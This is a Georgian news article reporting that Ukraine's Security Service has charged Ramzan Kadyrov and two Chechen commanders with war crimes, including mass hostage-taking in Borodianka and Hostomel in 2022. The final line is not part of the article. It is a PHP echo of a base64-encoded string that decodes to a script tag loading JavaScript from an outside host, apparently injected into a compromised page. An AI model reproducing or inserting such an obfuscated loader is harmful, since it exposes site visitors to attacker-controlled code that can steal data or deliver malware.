celsiusi
ავერსი შნაიდერი
უკრაინამ ჩეჩნეთის ლიდერსა და პუტინის მარჯვენა ხელს, რამზან კადიროვს ომის დანაშაულებისთვის ბრალი წაუყენა. უკრაინის უსაფრთხოების სამსახურის ინფორმაციით, კადიროვის გარდა, ბრალი წაუყენეს მის ორ თანამზრახველს.
 
ესენი არიან დანიელ მარტინოვი, რუსეთის ფედერაციის ეროვნული გვარდიის ჯარების სამმართველოს უფროსის მოადგილე ჩეჩნეთის რესპუბლიკაში;
 
და რუსეთის ფედერაციის 46-ე ცალკეული მოტორიზებული ბატალიონის "სამხრეთის" ტაქტიკური ჯგუფის 249-ე მეთაური ჰუსეინ მეჟიდოვი.
 
„დოკუმენტირებულია, რომ 2022 წლის თებერვალ-მარტში კადიროვი პირადად აკონტროლებდა ამ ქვედანაყოფების ინდივიდუალური სამხედრო ოპერაციების შემუშავებასა და დაგეგმვას, გასცემდა ბრძანებებს, უსმენდა მათი ლიდერების მოხსენებებს“ - ნათქვამია განცხადებაში.
 
უსაფრთხოების სამსახურის ინფორმაციითვე, 5 მარტს, მარტინოვი პირადად ხელმძღვანელობდა ბოროდიანის ფსიქონევროლოგიური პანსიონის აღებას. მისი ბრძანებით, მძევლად აიყვანეს 500-მდე ადამიანი (პაციენტები, პერსონალი და ადგილობრივი მცხოვრებლები), მათ შორის ასზე მეტი საწოლს მიჯაჭვული პაციენტი; შენობის მისადგომები დანაღმეს, თავად სკოლა-ინტერნატი კი ოკუპანტების საცეცხლე პოზიციად გადააქციეს.
 
 
ჰუსეინ მეჟიდოვის ბრძანებით კი, 25 თებერვლიდან 13 მარტამდე პერიოდში ჰოსტომელის 200-მდე მცხოვრები მძევლად აიყვანეს და მრავალსართულიანი შენობების სარდაფებში დაატყვევეს.
 
დაშავდნენ ქალები, მოხუცები და ბავშვები, ხოლო ტყვეები, რომლებმაც ვერ გაუძლეს ტყვეობის არაადამიანურ პირობებს და დაიღუპნენ, იქვე, სახლთან დამარხეს.
 
უკრაინის უსაფრთხოების სამსახური რამზან კადიროვს ეჭვმიტანილად აცხადებს უკრაინის სსკ-ის სამი მუხლით გათვალისწინებული დანაშაულების ჩადენაში. მათ შორისაა ომის დაგეგმვა, მომზადება, წამოწყება. ასევე, უკრაინის ტერიტორიის საზღვრების შეცვლას კონსტიტუციით დადგენილი წესრიგის დარღვევით, რამაც გამოიწვია ადამიანების სიკვდილი და სხვა მძიმე შედეგები და 2014 წელს, რუსეთის ფედერაციის მიერ დაწყებული კანონიერი შეიარაღებული აგრესიის გამართლება უკრაინის წინააღმდეგ.
 
მარტინოვს და მეჟიდოვს ბრალად ედებათ სისხლის სამართლის კოდექსის 438-ე მუხლით გათვალისწინებული დანაშაული (ომის კანონებისა და წეს-ჩვეულებების დარღვევა, სამხედრო ტყვეების ან მშვიდობიანი მოსახლეობის მიმართ სასტიკი მოპყრობა).
 
 
571
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");